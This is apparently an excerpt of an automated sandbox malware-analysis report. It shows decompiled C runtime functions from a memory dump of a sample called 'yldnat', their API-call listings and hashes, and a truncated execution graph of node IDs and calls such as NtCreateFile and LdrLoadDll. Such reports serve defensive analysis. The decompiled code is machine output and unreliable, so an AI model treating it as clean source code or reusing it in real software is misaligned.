                                                        0x013b3a29
                                                        0x00000000
                                                        0x013b3a29
                                                        0x013b39c0
                                                        0x013b39c2
                                                        0x00000000
                                                        0x00000000
                                                        0x013b39c4
                                                        0x013b39c6
                                                        0x013b39c8
                                                        0x00000000
                                                        0x00000000
                                                        0x013b39ca
                                                        0x013b39cc
                                                        0x013b39dc
                                                        0x013b39e9
                                                        0x013b39f0
                                                        0x013b39f5
                                                        0x013b39fc
                                                        0x013b3a06
                                                        0x013b3a0a
                                                        0x013b3a0f
                                                        0x013b3a12
                                                        0x013b3a12
                                                        0x013b3a12
                                                        0x013b3a15
                                                        0x013b3a18
                                                        0x013b3a18
                                                        0x00000000
                                                        0x013b3a18
                                                        0x013b39cf
                                                        0x013b39d5
                                                        0x013b39d8
                                                        0x013b39da
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x013b39da
                                                        0x00000000
                                                        0x013b39b1
                                                        0x013b38ea
                                                        0x00000000

                                                        APIs
                                                        • __lock.LIBCMT ref: 013B38B6
                                                          • Part of subcall function 013B442F: __mtinitlocknum.LIBCMT ref: 013B4441
                                                          • Part of subcall function 013B442F: EnterCriticalSection.KERNEL32(00000000,?,013B37AB,0000000D), ref: 013B445A
                                                        • __calloc_crt.LIBCMT ref: 013B38C7
                                                          • Part of subcall function 013B4869: __calloc_impl.LIBCMT ref: 013B4878
                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 013B38E2
                                                        • GetStartupInfoW.KERNEL32(?,013C2260,00000064,013B1654,013C2190,00000014), ref: 013B393B
                                                        • __calloc_crt.LIBCMT ref: 013B3986
                                                        • GetFileType.KERNEL32 ref: 013B39CF
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.983533144.00000000013B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 013B0000, based on PE: true
                                                        • Associated: 00000005.00000002.983529361.00000000013B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000005.00000002.983545056.00000000013BE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000005.00000002.983553202.00000000013C3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000005.00000002.983563219.00000000013C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_13b0000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: __calloc_crt$CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__calloc_impl__lock__mtinitlocknum
                                                        • String ID:
                                                        • API String ID: 2772871689-0
                                                        • Opcode ID: da754f77a62c1b6ce1f50bf49b53589930d17e64e9fb6347d91e4e545bfb3738
                                                        • Instruction ID: 463fd28c463a446911fc3b38428eb700c8d6f8cb2cb158ca4cb62a813851a8ee
                                                        • Opcode Fuzzy Hash: da754f77a62c1b6ce1f50bf49b53589930d17e64e9fb6347d91e4e545bfb3738
                                                        • Instruction Fuzzy Hash: 2881A371D042658EDB24CF68D8C06E9BFF4BF05328B24426DD6A6ABBC1E7359402CB54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 013B3815 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 91%
                                                        			E013B3815(void* __ebx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E013B1890(_t3);
				if(E013B4560() != 0) {
					_t6 = E013B4001(E013B35A6);
					 *0x13c350c = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E013B4869(1, 0x3bc);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E013B388B();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E013B405D( *0x13c350c, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E013B3762(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E013B388B();
					return 0;
				}
			}








                                                        0x013b3815
                                                        0x013b3821
                                                        0x013b3830
                                                        0x013b3835
                                                        0x013b383b
                                                        0x013b383e
                                                        0x00000000
                                                        0x013b3840
                                                        0x013b384d
                                                        0x013b3851
                                                        0x013b3853
                                                        0x013b3882
                                                        0x013b3882
                                                        0x013b3887
                                                        0x013b388a
                                                        0x013b3855
                                                        0x013b3863
                                                        0x013b3865
                                                        0x00000000
                                                        0x013b3867
                                                        0x013b3867
                                                        0x013b3869
                                                        0x013b386a
                                                        0x013b3871
                                                        0x013b3877
                                                        0x013b387b
                                                        0x013b387f
                                                        0x013b3881
                                                        0x013b3881
                                                        0x013b3865
                                                        0x013b3853
                                                        0x013b3823
                                                        0x013b3823
                                                        0x013b3823
                                                        0x013b382a
                                                        0x013b382a

                                                        APIs
                                                        • __init_pointers.LIBCMT ref: 013B3815
                                                          • Part of subcall function 013B1890: RtlEncodePointer.NTDLL(00000000,?,013B381A,013B163A,013C2190,00000014), ref: 013B1893
                                                          • Part of subcall function 013B1890: __initp_misc_winsig.LIBCMT ref: 013B18AE
                                                          • Part of subcall function 013B1890: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 013B4117
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 013B412B
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 013B413E
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 013B4151
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 013B4164
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 013B4177
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 013B418A
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 013B419D
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 013B41B0
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 013B41C3
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 013B41D6
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 013B41E9
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 013B41FC
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 013B420F
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 013B4222
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 013B4235
                                                        • __mtinitlocks.LIBCMT ref: 013B381A
                                                        • __mtterm.LIBCMT ref: 013B3823
                                                          • Part of subcall function 013B388B: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,013B3828,013B163A,013C2190,00000014), ref: 013B447A
                                                          • Part of subcall function 013B388B: _free.LIBCMT ref: 013B4481
                                                          • Part of subcall function 013B388B: DeleteCriticalSection.KERNEL32(013C3558,?,?,013B3828,013B163A,013C2190,00000014), ref: 013B44A3
                                                        • __calloc_crt.LIBCMT ref: 013B3848
                                                        • __initptd.LIBCMT ref: 013B386A
                                                        • GetCurrentThreadId.KERNEL32(013B163A,013C2190,00000014), ref: 013B3871
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.983533144.00000000013B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 013B0000, based on PE: true
                                                        • Associated: 00000005.00000002.983529361.00000000013B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000005.00000002.983545056.00000000013BE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000005.00000002.983553202.00000000013C3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000005.00000002.983563219.00000000013C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_13b0000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                        • String ID:
                                                        • API String ID: 3567560977-0
                                                        • Opcode ID: a3341522df69caadc8c04ee5c7168d8094e6b8cd2ca5b32baa230ad00c5bf104
                                                        • Instruction ID: 4ff6e06c271ae31320a9a8c990d9df11fcff4c1183c2e4631f0cd89de2c6d58c
                                                        • Opcode Fuzzy Hash: a3341522df69caadc8c04ee5c7168d8094e6b8cd2ca5b32baa230ad00c5bf104
                                                        • Instruction Fuzzy Hash: 89F09032509632ADE239767D7CC16DA2E84EF1177CF20862EE761D8CD1FF2294414795
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 013B7452 Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        C-Code - Quality: 95%
                                                        			E013B7452(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				void* _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				void* _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					if(_t31 != 0) {
						_push(__ebx);
						while(_t31 <= 0xffffffe0) {
							if(_t31 == 0) {
								_t31 = _t31 + 1;
							}
							_t7 = HeapReAlloc( *0x13c4834, 0, _a4, _t31);
							_t20 = _t7;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								if( *0x13c4830 == _t7) {
									_t9 = E013B1CC3();
									 *_t9 = E013B1CD6(GetLastError());
									goto L17;
								} else {
									if(E013B1741(_t7, _t31) == 0) {
										_t12 = E013B1CC3();
										 *_t12 = E013B1CD6(GetLastError());
										L12:
										_t8 = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E013B1741(_t6, _t31);
						 *((intOrPtr*)(E013B1CC3())) = 0xc;
						goto L12;
					} else {
						E013B4831(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E013B1147(__ebx, __edx, __edi, _a8);
				}
			}









                                                        0x013b7459
                                                        0x013b7467
                                                        0x013b746c
                                                        0x013b747b
                                                        0x013b74ae
                                                        0x013b7480
                                                        0x013b7482
                                                        0x013b7482
                                                        0x013b748f
                                                        0x013b7495
                                                        0x013b7499
                                                        0x013b74f9
                                                        0x013b74f9
                                                        0x013b749b
                                                        0x013b74a1
                                                        0x013b74e3
                                                        0x013b74f7
                                                        0x00000000
                                                        0x013b74a3
                                                        0x013b74ac
                                                        0x013b74cb
                                                        0x013b74df
                                                        0x013b74c5
                                                        0x013b74c5
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x013b74ac
                                                        0x013b74a1
                                                        0x00000000
                                                        0x013b74c7
                                                        0x013b74b4
                                                        0x013b74bf
                                                        0x00000000
                                                        0x013b746e
                                                        0x013b7471
                                                        0x013b7477
                                                        0x013b7477
                                                        0x013b74c8
                                                        0x013b74ca
                                                        0x013b745b
                                                        0x013b7465
                                                        0x013b7465

                                                        APIs
                                                        • _malloc.LIBCMT ref: 013B745E
                                                          • Part of subcall function 013B1147: __FF_MSGBANNER.LIBCMT ref: 013B115E
                                                          • Part of subcall function 013B1147: __NMSG_WRITE.LIBCMT ref: 013B1165
                                                          • Part of subcall function 013B1147: RtlAllocateHeap.NTDLL(00800000,00000000,00000001,00000000,00000000,00000000,?,013B48C7,00000000,00000000,00000000,00000000,?,013B44F9,00000018,013C2280), ref: 013B118A
                                                        • _free.LIBCMT ref: 013B7471
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.983533144.00000000013B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 013B0000, based on PE: true
                                                        • Associated: 00000005.00000002.983529361.00000000013B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000005.00000002.983545056.00000000013BE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000005.00000002.983553202.00000000013C3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000005.00000002.983563219.00000000013C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_13b0000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap_free_malloc
                                                        • String ID:
                                                        • API String ID: 1020059152-0
                                                        • Opcode ID: d656b58623f40118e1b26a5e5085a7896989b0954aeb260ebf081a9e9bc256f3
                                                        • Instruction ID: 859dcdae0e9d528b2c7f2f5ac264ad57fc5d2a7282168220c136b21e0d057271
                                                        • Opcode Fuzzy Hash: d656b58623f40118e1b26a5e5085a7896989b0954aeb260ebf081a9e9bc256f3
                                                        • Instruction Fuzzy Hash: C2119431805616AACB313E7CB8D46D93F98EB50369F104525EB49AAEC0FA788940C790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 013B91C6 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E013B91C6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				signed int _v20;
				signed int _t35;
				int _t38;
				signed int _t41;
				int _t42;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				signed int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E013B4BFC( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E013B917B( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t41 = _v20;
							_t59 = 1;
							_t28 = _t41 + 4; // 0x840ffff8
							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t42;
							if(_t42 != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E013B1CC3();
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							_t20 = _t59 + 0x74; // 0xe1c11fe1
							__eflags = _t50 -  *_t20;
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(_t62[1] == 0) {
								goto L20;
							}
							L18:
							_t22 = _t59 + 0x74; // 0xe1c11fe1
							_t59 =  *_t22;
							goto L21;
						}
						_t12 = _t59 + 0x74; // 0xe1c11fe1
						__eflags = _t50 -  *_t12;
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t17 = _t59 + 0x74; // 0xe1c11fe1
						_t18 = _t59 + 4; // 0x840ffff8
						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}


















                                                        0x013b91ce
                                                        0x013b91d3
                                                        0x013b91ed
                                                        0x00000000
                                                        0x013b91ed
                                                        0x013b91d5
                                                        0x013b91da
                                                        0x00000000
                                                        0x00000000
                                                        0x013b91df
                                                        0x013b91fc
                                                        0x013b9201
                                                        0x013b9204
                                                        0x013b920b
                                                        0x013b922a
                                                        0x013b9231
                                                        0x013b9233
                                                        0x013b9277
                                                        0x013b9283
                                                        0x013b9286
                                                        0x013b928b
                                                        0x013b928e
                                                        0x013b9294
                                                        0x013b9296
                                                        0x013b92a6
                                                        0x013b92a6
                                                        0x013b92aa
                                                        0x013b92ac
                                                        0x013b92af
                                                        0x013b92af
                                                        0x013b92af
                                                        0x013b92af
                                                        0x00000000
                                                        0x013b92b5
                                                        0x013b9298
                                                        0x013b9298
                                                        0x013b929d
                                                        0x013b929d
                                                        0x013b92a0
                                                        0x00000000
                                                        0x013b92a0
                                                        0x013b9235
                                                        0x013b9238
                                                        0x013b923c
                                                        0x013b9265
                                                        0x013b9265
                                                        0x013b9265
                                                        0x013b9268
                                                        0x013b9268
                                                        0x00000000
                                                        0x00000000
                                                        0x013b926a
                                                        0x013b926e
                                                        0x00000000
                                                        0x00000000
                                                        0x013b9270
                                                        0x013b9270
                                                        0x013b9270
                                                        0x00000000
                                                        0x013b9270
                                                        0x013b923e
                                                        0x013b923e
                                                        0x013b9241
                                                        0x00000000
                                                        0x00000000
                                                        0x013b9245
                                                        0x013b924f
                                                        0x013b9255
                                                        0x013b9258
                                                        0x013b925e
                                                        0x013b9261
                                                        0x013b9263
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x013b9263
                                                        0x013b920d
                                                        0x013b9210
                                                        0x013b9212
                                                        0x013b9217
                                                        0x013b9217
                                                        0x013b921c
                                                        0x00000000
                                                        0x013b921c
                                                        0x013b91e1
                                                        0x013b91e6
                                                        0x013b91ea
                                                        0x013b91ea
                                                        0x00000000

                                                        APIs
                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 013B91FC
                                                        • __isleadbyte_l.LIBCMT ref: 013B922A
                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 013B9258
                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000), ref: 013B928E
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.983533144.00000000013B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 013B0000, based on PE: true
                                                        • Associated: 00000005.00000002.983529361.00000000013B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000005.00000002.983545056.00000000013BE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000005.00000002.983553202.00000000013C3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000005.00000002.983563219.00000000013C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_13b0000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                        • String ID:
                                                        • API String ID: 3058430110-0
                                                        • Opcode ID: 179524b547c1659d597cb0f7ecacbe480c9fc492c6471cc5f858324418a6fecd
                                                        • Instruction ID: d86a7a1f11582a673608fc84ac8bb432bb18804f92e15a5ae5a2cb95dde52d73
                                                        • Opcode Fuzzy Hash: 179524b547c1659d597cb0f7ecacbe480c9fc492c6471cc5f858324418a6fecd
                                                        • Instruction Fuzzy Hash: 9C31C271A0024EAFEB218E69CC84BEA7FA9BF4131CF154128E7158B990F731D850DB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 013BA94D Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E013BA94D(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E013BAE9E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E013BA9D3(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E013BB119(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E013BB058(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                                                        0x013ba950
                                                        0x013ba956
                                                        0x013ba9c9
                                                        0x00000000
                                                        0x013ba95d
                                                        0x013ba95d
                                                        0x013ba960
                                                        0x013ba97b
                                                        0x013ba97e
                                                        0x013ba99e
                                                        0x013ba9b0
                                                        0x013ba980
                                                        0x013ba980
                                                        0x013ba983
                                                        0x00000000
                                                        0x013ba985
                                                        0x013ba997
                                                        0x013ba997
                                                        0x013ba983
                                                        0x013ba9ce
                                                        0x013ba9d2
                                                        0x013ba962
                                                        0x013ba97a
                                                        0x013ba97a
                                                        0x013ba960

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.983533144.00000000013B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 013B0000, based on PE: true
                                                        • Associated: 00000005.00000002.983529361.00000000013B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000005.00000002.983545056.00000000013BE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000005.00000002.983553202.00000000013C3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000005.00000002.983563219.00000000013C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_13b0000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                        • String ID:
                                                        • API String ID: 3016257755-0
                                                        • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                        • Instruction ID: d722a6699da6baaa2af529011bcd170f5a409b5f950ebcbb33fffb9adf9c83e0
                                                        • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                        • Instruction Fuzzy Hash: 72014C7604464EFBCF125F88CC818EE3F66BB19258B4A8515FF195A830E736C5B1BB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:3%
                                                        Dynamic/Decrypted Code Coverage:3.5%
                                                        Signature Coverage:5.7%
                                                        Total number of Nodes:634
                                                        Total number of Limit Nodes:3
                                                        execution_graph 47105 91e751 47106 91e76e 47105->47106 47107 91e8aa 47106->47107 47113 86e0c6 LdrInitializeThunk 47106->47113 47109 91e79e 47112 91e7a4 47109->47112 47114 85f900 LdrInitializeThunk 47109->47114 47112->47107 47115 86e025 LdrInitializeThunk 47112->47115 47113->47109 47114->47112 47115->47107 47116 41f260 47119 41b990 47116->47119 47120 41b9b6 47119->47120 47131 409100 47120->47131 47122 41b9c2 47130 41ba09 47122->47130 47139 40d710 47122->47139 47124 41b9d7 47127 41b9ec 47124->47127 47187 41a620 47124->47187 47151 40abb0 47127->47151 47128 41b9fb 47129 41a620 2 API calls 47128->47129 47129->47130 47132 40910d 47131->47132 47190 409050 47131->47190 47134 409114 47132->47134 47202 408ff0 47132->47202 47134->47122 47140 40d73c 47139->47140 47619 40a5b0 47140->47619 47142 40d74e 47623 40d620 47142->47623 47145 40d781 47148 40d792 47145->47148 47150 41a400 2 API calls 47145->47150 47146 40d769 47147 40d774 47146->47147 47149 41a400 2 API calls 47146->47149 47147->47124 47148->47124 47149->47147 47150->47148 47152 40abd5 47151->47152 47153 40a5b0 LdrLoadDll 47152->47153 47154 40ac2c 47153->47154 47642 40a230 47154->47642 47156 40aea3 47156->47128 47157 40ac52 47157->47156 47651 414f90 47157->47651 47159 40ac97 47159->47156 47654 407dc0 47159->47654 47161 40acdb 47161->47156 47671 41a470 47161->47671 47165 40ad31 47166 40ad38 47165->47166 47683 419f80 47165->47683 47167 41bea0 2 API calls 47166->47167 47169 40ad45 47167->47169 47169->47128 47171 40ad82 47172 41bea0 2 API calls 47171->47172 47173 40ad89 47172->47173 47173->47128 47174 40ad92 47175 40d7a0 3 API calls 47174->47175 47176 40ae06 47175->47176 47176->47166 47177 40ae11 47176->47177 47178 41bea0 2 API calls 47177->47178 47179 40ae35 47178->47179 47688 419fd0 47179->47688 47182 419f80 2 API calls 47183 40ae70 47182->47183 47183->47156 47693 419d90 47183->47693 47186 41a620 2 API calls 47186->47156 47188 41af20 LdrLoadDll 47187->47188 47189 41a63f ExitProcess 47188->47189 47191 409063 47190->47191 47242 418b40 LdrLoadDll 47190->47242 47222 4189f0 47191->47222 47194 409076 47194->47132 47195 40906c 47195->47194 47225 41b2d0 47195->47225 47197 4090b3 47197->47194 47236 408e70 47197->47236 47199 4090d3 47243 4088d0 LdrLoadDll 47199->47243 47201 4090e5 47201->47132 47203 409000 47202->47203 47594 41b5c0 47203->47594 47206 41b5c0 LdrLoadDll 47207 40901b 47206->47207 47208 41b5c0 LdrLoadDll 47207->47208 47209 409031 47208->47209 47210 40d510 47209->47210 47211 40d529 47210->47211 47602 40a430 47211->47602 47213 40d53c 47606 41a150 47213->47606 47216 409125 47216->47122 47218 40d562 47219 40d58d 47218->47219 47612 41a1d0 47218->47612 47221 41a400 2 API calls 47219->47221 47221->47216 47244 41a570 47222->47244 47226 41b2e9 47225->47226 47257 415640 47226->47257 47228 41b301 47229 41b30a 47228->47229 47296 41b110 47228->47296 47229->47197 47231 41b31e 47231->47229 47313 419e70 47231->47313 47572 4071c0 47236->47572 47238 408e91 47238->47199 47239 408e8a 47239->47238 47585 407480 47239->47585 47242->47191 47243->47201 47245 418a05 47244->47245 47247 41af20 47244->47247 47245->47195 47248 41afa5 47247->47248 47250 41af2f 47247->47250 47248->47245 47250->47248 47251 415a40 47250->47251 47252 415a5a 47251->47252 47253 415a4e 47251->47253 47252->47248 47253->47252 47256 415ec0 LdrLoadDll 47253->47256 47255 415bac 47255->47248 47256->47255 47258 415975 47257->47258 47259 415654 47257->47259 47258->47228 47259->47258 47321 419bc0 47259->47321 47262 41576d 47262->47228 47263 415780 47324 41a2d0 47263->47324 47264 415763 47383 41a3d0 LdrLoadDll 47264->47383 47267 4157a7 47268 41bea0 2 API calls 47267->47268 47270 4157b3 47268->47270 47269 415939 47272 41a400 2 API calls 47269->47272 47270->47262 47270->47269 47271 41594f 47270->47271 47276 415842 47270->47276 47392 415380 LdrLoadDll NtReadFile NtClose 47271->47392 47273 415940 47272->47273 47273->47228 47275 415962 47275->47228 47277 4158a9 47276->47277 47279 415851 47276->47279 47277->47269 47278 4158bc 47277->47278 47385 41a250 47278->47385 47281 415856 47279->47281 47282 41586a 47279->47282 47384 415240 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 47281->47384 47283 415887 47282->47283 47284 41586f 47282->47284 47283->47273 47340 415000 47283->47340 47328 4152e0 47284->47328 47287 415860 47287->47228 47290 41587d 47290->47228 47292 41591c 47389 41a400 47292->47389 47294 41589f 47294->47228 47295 415928 47295->47228 47297 41b12b 47296->47297 47298 41b13d 47297->47298 47410 41be20 47297->47410 47298->47231 47300 41b15d 47413 414c60 47300->47413 47302 41b180 47302->47298 47303 414c60 3 API calls 47302->47303 47305 41b1a2 47303->47305 47305->47298 47445 415f80 47305->47445 47306 41b22a 47307 41b23a 47306->47307 47540 41aea0 LdrLoadDll 47306->47540 47456 41ad10 47307->47456 47310 41b268 47535 419e30 47310->47535 47314 41af20 LdrLoadDll 47313->47314 47315 419e8c 47314->47315 47568 85fae8 LdrInitializeThunk 47315->47568 47316 419ea7 47318 41bea0 47316->47318 47569 41a5e0 47318->47569 47320 41b379 47320->47197 47322 41af20 LdrLoadDll 47321->47322 47323 415734 47322->47323 47323->47262 47323->47263 47323->47264 47325 41a2e6 47324->47325 47326 41af20 LdrLoadDll 47325->47326 47327 41a2ec NtCreateFile 47326->47327 47327->47267 47329 4152fc 47328->47329 47330 41a250 LdrLoadDll 47329->47330 47331 41531d 47330->47331 47332 415324 47331->47332 47333 415338 47331->47333 47335 41a400 2 API calls 47332->47335 47334 41a400 2 API calls 47333->47334 47336 415341 47334->47336 47337 41532d 47335->47337 47393 41c0b0 LdrLoadDll RtlAllocateHeap 47336->47393 47337->47290 47339 41534c 47339->47290 47341 41504b 47340->47341 47342 41507e 47340->47342 47343 41a250 LdrLoadDll 47341->47343 47344 4151c9 47342->47344 47349 41509a 47342->47349 47345 415066 47343->47345 47346 41a250 LdrLoadDll 47344->47346 47347 41a400 2 API calls 47345->47347 47348 4151e4 47346->47348 47350 41506f 47347->47350 47406 41a290 LdrLoadDll NtCreateFile 47348->47406 47352 41a250 LdrLoadDll 47349->47352 47350->47294 47353 4150b5 47352->47353 47355 4150d1 47353->47355 47356 4150bc 47353->47356 47357 4150d6 47355->47357 47358 4150ec 47355->47358 47360 41a400 2 API calls 47356->47360 47362 41a400 2 API calls 47357->47362 47369 4150f1 47358->47369 47394 41c070 47358->47394 47359 41521e 